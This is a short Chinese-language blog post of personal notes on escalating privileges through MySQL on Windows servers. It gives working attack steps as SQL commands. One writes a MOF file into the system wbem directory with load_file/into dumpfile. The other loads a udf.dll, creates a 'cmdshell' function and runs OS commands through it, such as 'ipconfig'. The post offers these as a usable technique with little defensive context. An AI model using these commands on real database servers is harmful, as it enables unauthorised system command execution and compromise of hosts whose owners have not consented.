mysql提权笔记
提权
发布日期:   2019-11-16
阅读次数:  

0x02 mof提权

利用条件

  • windows<=2003

  • 可写入c:/windows/system32/mof目录 ,此文件会自动执行

select load_file('C:/wmpub/nullevt.mof') into dumpfile
'c:/windows/system32/wbem/mof/nullevt.mof’

0x03 udf提权操作

利用条件

  • 账号具有对Mysql的insert和delete权限

利用过程

  1. 获取相应权限后上传udf.php

  2. 访问udf.php进行连接(需要能够远程连接)

  3. D:\xampp\mysql\lib\plugin\udf.dll
    链接成功后导出DLL文件(注意目录)
    mysql<5.0,导出路径随意;
    5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如:system32)
    mysql>5.1,需要导出到mysql的插件目录
    查看插件目录:show variables like ‘%plugin%’;

  4. 创建自定义函数:Create Function cmdshell returns string soname ‘udf.dll’

    已经存在:drop function cmdshell;

  5. 执行函数:select cmdshell(‘ipconfig’)

  转载请注明: 星晴 mysql提权笔记

 上一篇
order by 注入 order by 注入
order by 注入 order by 在不知道列名的情况下,可以通过列的序号来代替相应的列。但是经过测试这里无法做运算,如order by 3-1和order by 2是不一样的。 当desc参数可控的时候,使用if(exp,desc,
2019-11-16 starjian
ctf
下一篇 
html5学习-table布局笔记 html5学习-table布局笔记
1. html的常用标签 常用标签: b : 加粗 i : 斜体 strong: 加粗, 带语义标签 em: 斜体, 带语义 p: 段落标签 img:常用的属性: - width : 宽度 - height: 高度 -
2019-11-16 starjian
web前端
  目录